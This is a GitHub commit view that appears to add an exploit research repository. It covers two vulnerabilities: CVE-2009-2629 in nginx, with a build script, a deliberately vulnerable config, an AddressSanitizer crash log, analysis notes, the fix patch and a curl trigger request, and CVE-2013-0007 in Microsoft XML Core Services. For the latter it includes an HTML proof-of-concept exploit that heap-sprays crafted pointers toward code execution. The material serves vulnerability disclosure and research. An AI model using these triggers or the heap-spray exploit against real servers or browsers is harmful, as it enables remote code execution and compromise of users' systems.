Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
116 changed files
with
15,806 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
# Disclosure Note | ||
|
||
CVE-2009-2629: nginx http module Buffer Underflow Remote Code Execution Vulnerability | ||
|
||
Awesome bug, one of a kind. A classical exploitable buffer underflow. Off-by-one in http parsing. Requires a non-standard configuration. Some servers on the Internet still have it (<1%) | ||
|
||
### Credits | ||
|
||
Vulnerability discovery: unknown | ||
Vulnerability analysis: Alisa Esage | ||
Proof of concept: Alisa Esage |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
./configure --with-debug --with-cc-opt=-g -Wno-error -fsanitize=address --with-ld-opt=-fsanitize=address --prefix=/home/am/Test/nginx-0.8.14_asan --sbin-path=/home/am/Test/nginx-0.8.14_asan --conf-path=/home/am/Test/nginx-0.8.14_asan/nginx.conf --error-log-path=/home/am/Test/nginx-0.8.14_asan/error.log --http-log-path=/home/am/Test/nginx-0.8.14_asan/access.log --pid-path=/tmp/nginx-0.8.14_asan.pid --lock-path=/var/lock/nginx-0.8.14_asan.lock --with-pcre=/media/psf/Code/pcre-8.34 --with-zlib=/media/psf/Code/zlib-1.2.11 | ||
make && make install | ||
export ASAN_OPTIONS=detect_leaks=false |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,121 @@ | ||
|
||
#user nobody; | ||
worker_processes 1; | ||
|
||
#error_log logs/error.log; | ||
#error_log logs/error.log notice; | ||
#error_log logs/error.log info; | ||
|
||
#pid logs/nginx.pid; | ||
|
||
|
||
events { | ||
worker_connections 1024; | ||
} | ||
|
||
|
||
http { | ||
|
||
merge_slashes off; | ||
|
||
include mime.types; | ||
default_type application/octet-stream; | ||
|
||
#log_format main '$remote_addr - $remote_user [$time_local] "$request" ' | ||
# '$status $body_bytes_sent "$http_referer" ' | ||
# '"$http_user_agent" "$http_x_forwarded_for"'; | ||
|
||
#access_log logs/access.log main; | ||
|
||
sendfile on; | ||
#tcp_nopush on; | ||
|
||
#keepalive_timeout 0; | ||
keepalive_timeout 65; | ||
|
||
#gzip on; | ||
|
||
server { | ||
listen 80; | ||
server_name localhost; | ||
|
||
#charset koi8-r; | ||
|
||
#access_log logs/host.access.log main; | ||
|
||
location / { | ||
root html; | ||
index index.html index.htm; | ||
} | ||
|
||
#error_page 404 /404.html; | ||
|
||
# redirect server error pages to the static page /50x.html | ||
# | ||
error_page 500 502 503 504 /50x.html; | ||
location = /50x.html { | ||
root html; | ||
} | ||
|
||
# proxy the PHP scripts to Apache listening on 127.0.0.1:80 | ||
# | ||
#location ~ \.php$ { | ||
# proxy_pass http://127.0.0.1; | ||
#} | ||
|
||
# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 | ||
# | ||
#location ~ \.php$ { | ||
# root html; | ||
# fastcgi_pass 127.0.0.1:9000; | ||
# fastcgi_index index.php; | ||
# fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; | ||
# include fastcgi_params; | ||
#} | ||
|
||
# deny access to .htaccess files, if Apache's document root | ||
# concurs with nginx's one | ||
# | ||
#location ~ /\.ht { | ||
# deny all; | ||
#} | ||
} | ||
|
||
|
||
# another virtual host using mix of IP-, name-, and port-based configuration | ||
# | ||
#server { | ||
# listen 8000; | ||
# listen somename:8080; | ||
# server_name somename alias another.alias; | ||
|
||
# location / { | ||
# root html; | ||
# index index.html index.htm; | ||
# } | ||
#} | ||
|
||
|
||
# HTTPS server | ||
# | ||
#server { | ||
# listen 443; | ||
# server_name localhost; | ||
|
||
# ssl on; | ||
# ssl_certificate cert.pem; | ||
# ssl_certificate_key cert.key; | ||
|
||
# ssl_session_timeout 5m; | ||
|
||
# ssl_protocols SSLv2 SSLv3 TLSv1; | ||
# ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP; | ||
# ssl_prefer_server_ciphers on; | ||
|
||
# location / { | ||
# root html; | ||
# index index.html index.htm; | ||
# } | ||
#} | ||
|
||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
2018/11/14 00:06:36 [emerg] 6868#0: bind() to 0.0.0.0:80 failed (13: Permission denied) | ||
2018/11/14 00:07:22 [emerg] 6940#0: bind() to 0.0.0.0:80 failed (13: Permission denied) | ||
================================================================= | ||
==6950==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000b4ff at pc 0x555a74c419db bp 0x7ffdf6992480 sp 0x7ffdf6992478 | ||
READ of size 1 at 0x62100000b4ff thread T0 | ||
#0 0x555a74c419da in ngx_http_parse_complex_uri src/http/ngx_http_parse.c:1141 | ||
#1 0x555a74c3d56c in ngx_http_process_request_line src/http/ngx_http_request.c:731 | ||
#2 0x555a74c33540 in ngx_http_init_request src/http/ngx_http_request.c:513 | ||
#3 0x555a74c13f84 in ngx_epoll_process_events src/event/modules/ngx_epoll_module.c:642 | ||
#4 0x555a74bfb666 in ngx_process_events_and_timers src/event/ngx_event.c:245 | ||
#5 0x555a74c10231 in ngx_worker_process_cycle src/os/unix/ngx_process_cycle.c:781 | ||
#6 0x555a74c0bd78 in ngx_spawn_process src/os/unix/ngx_process.c:196 | ||
#7 0x555a74c0e1f1 in ngx_start_worker_processes src/os/unix/ngx_process_cycle.c:345 | ||
#8 0x555a74c11985 in ngx_master_process_cycle src/os/unix/ngx_process_cycle.c:136 | ||
#9 0x555a74bc1366 in main src/core/nginx.c:382 | ||
#10 0x7f94b9b7f2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0) | ||
#11 0x555a74bbed39 in _start (/home/am/Test/nginx-0.8.14_asan/nginx+0x3ad39) | ||
|
||
0x62100000b4ff is located 1 bytes to the left of 4096-byte region [0x62100000b500,0x62100000c500) | ||
allocated by thread T0 here: | ||
#0 0x7f94ba68ad28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28) | ||
#1 0x555a74c05f59 in ngx_alloc src/os/unix/ngx_alloc.c:21 | ||
|
||
SUMMARY: AddressSanitizer: heap-buffer-overflow src/http/ngx_http_parse.c:1141 in ngx_http_parse_complex_uri | ||
Shadow bytes around the buggy address: | ||
0x0c427fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
0x0c427fff9650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
0x0c427fff9660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
0x0c427fff9670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
0x0c427fff9680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
=>0x0c427fff9690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] | ||
0x0c427fff96a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
0x0c427fff96b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
0x0c427fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
0x0c427fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
0x0c427fff96e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
Shadow byte legend (one shadow byte represents 8 application bytes): | ||
Addressable: 00 | ||
Partially addressable: 01 02 03 04 05 06 07 | ||
Heap left redzone: fa | ||
Heap right redzone: fb | ||
Freed heap region: fd | ||
Stack left redzone: f1 | ||
Stack mid redzone: f2 | ||
Stack right redzone: f3 | ||
Stack partial redzone: f4 | ||
Stack after return: f5 | ||
Stack use after scope: f8 | ||
Global redzone: f9 | ||
Global init order: f6 | ||
Poisoned by user: f7 | ||
Container overflow: fc | ||
Array cookie: ac | ||
Intra object redzone: bb | ||
ASan internal: fe | ||
Left alloca redzone: ca | ||
Right alloca redzone: cb | ||
==6950==ABORTING |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
06.06.2019. Check if the merge_slashes directive is required | ||
|
||
ngx_http_parse_complex_uri: | ||
... | ||
case sw_dot_dot: | ||
... | ||
case '/': | ||
state = sw_slash; | ||
u -= 4; // <--------- culprit | ||
if (u < r->uri.data) { | ||
return NGX_HTTP_PARSE_INVALID_REQUEST; | ||
} | ||
while (*(u - 1) != '/') { | ||
u--; | ||
} | ||
|
||
`u` contains the URI. It must be 4+ characters long to pass the check < r->uri.data. If the URI always starts with a '/' (seems like it, but I didn't prove it), then it must be exactly 4 characters long: otherwise the loop will hit a slash and no underflow. | ||
|
||
If the merge_slashes directive is on (default), then there seems to be no way to make a 4-char URI without additional slashes. | ||
If the merge_slashes is off, then: //../ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
Index: src/http/ngx_http_parse.c | ||
=================================================================== | ||
--- src/http/ngx_http_parse.c (revision 2410) | ||
+++ src/http/ngx_http_parse.c (revision 2411) | ||
@@ -1134,11 +1134,15 @@ | ||
#endif | ||
case '/': | ||
state = sw_slash; | ||
- u -= 4; | ||
- if (u < r->uri.data) { | ||
- return NGX_HTTP_PARSE_INVALID_REQUEST; | ||
- } | ||
- while (*(u - 1) != '/') { | ||
+ u -= 5; | ||
+ for ( ;; ) { | ||
+ if (u < r->uri.data) { | ||
+ return NGX_HTTP_PARSE_INVALID_REQUEST; | ||
+ } | ||
+ if (*u == '/') { | ||
+ u++; | ||
+ break; | ||
+ } | ||
u--; | ||
} | ||
break; | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
curl http://127.0.0.1//%2e%2e/asdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
# Disclosure Note | ||
|
||
CVE-2013-0007: Microsoft XML Core Services 4-6 Use-after-free Vulnerability | ||
|
||
From my Phrack paper: [Exploiting Microsoft XML with misalignment and factorials](http://phrack.org/issues/69/10.html) (2015) | ||
|
||
### Credits | ||
|
||
Vulnerability discovery: Nicolas Grégoire | ||
Vulnerability analysis: Alisa Esage | ||
Proof of concept exploit: Alisa Esage |
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,89 @@ | ||
<!doctype html> | ||
<html> | ||
<head> | ||
|
||
<script> | ||
|
||
function crash() | ||
{ | ||
xslcontent='<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template name="main_template" match="/"><xsl:for-each select="*"><xsl:apply-templates/></xsl:for-each></xsl:template><xsl:template name="xx" match="x[position()]" /></xsl:stylesheet>'; | ||
|
||
srcTree=new ActiveXObject("Msxml2.DOMDocument.6.0"); | ||
xsltTree=new ActiveXObject("Msxml2.DOMDocument.6.0"); | ||
xsltTree.loadXML(xslcontent); | ||
alert("crash"); | ||
srcTree.transformNode(xsltTree); | ||
} | ||
|
||
function selfpatch() | ||
{ | ||
// !!! +hpa required !!! | ||
// bp msxml6!xengine::stns;bp msxml6!xengine::brns;g; | ||
|
||
var intArr = new Array; | ||
intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01 | ||
|
||
var count = (0x19000000-0x20)/4; // 400 Mb | ||
|
||
// ptr0(crashing)->ptr1->ptr2->shellcode // 0x3a..0x40.. -> 0x3838xxxx -> 0x3838yyyy -> patch or shellcode | ||
|
||
var pbyte = 0x38; // play with me | ||
var ptr12base = (pbyte<<24)+(pbyte<<16); //0x38380000 // landing for the initial memory access | ||
var ptr1 = 0; // calculated from the page offset | ||
var ptr2 = 0; // calculated from the page offset | ||
var ptrcall = 0x54545454; // 0x5454xxxx -> pointers to shellcode | ||
|
||
var delta = 0x3300; // added and removed to segregate the 1st and the 2nd memory access areas within the pattern | ||
// the additional bits above 0x1000 are used to enforce the successful 1-byte misaligned memory access | ||
|
||
for(var i=1; i<=count; i++) | ||
{ | ||
var i_pattern = i*4%0x1000; // index into the current page | ||
|
||
// let’s fill the spray tail with plain pointers to call | ||
if ( i>(0x12000000/4) ) // which defines where the ‘tail’ begins (chosen empirically) | ||
{ | ||
intArr[i] = 0x00badd1e; | ||
continue; | ||
} | ||
|
||
ptr1 = (i_pattern - 8 + 0x20 + delta); | ||
ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff)); | ||
|
||
// misaligned memory access: fallback to code exec | ||
if ( ((i*4+0x20)&0xff) == (pbyte+4) ) | ||
intArr[i] = ptrcall; | ||
|
||
// well aligned memory access: restore the pointers | ||
else if (i_pattern < 0x0700) | ||
intArr[i] = ptr12base + ptr1; | ||
else | ||
intArr[i] = ptr12base + ptr2; | ||
} | ||
|
||
crash(); | ||
alert("Look, no calc!"); | ||
} | ||
|
||
function factorial(n) | ||
{ | ||
if (n == 0) | ||
{ | ||
selfpatch(); | ||
return 1; | ||
} | ||
else | ||
return n * factorial(n - 1); | ||
} | ||
</script> | ||
</head> | ||
|
||
<body onload="factorial(30);"> | ||
<form id="a"> | ||
</form> | ||
<dfn id="b"> | ||
</dfn> | ||
<div id="resTree"></div> | ||
|
||
</body> | ||
</html> |
Oops, something went wrong.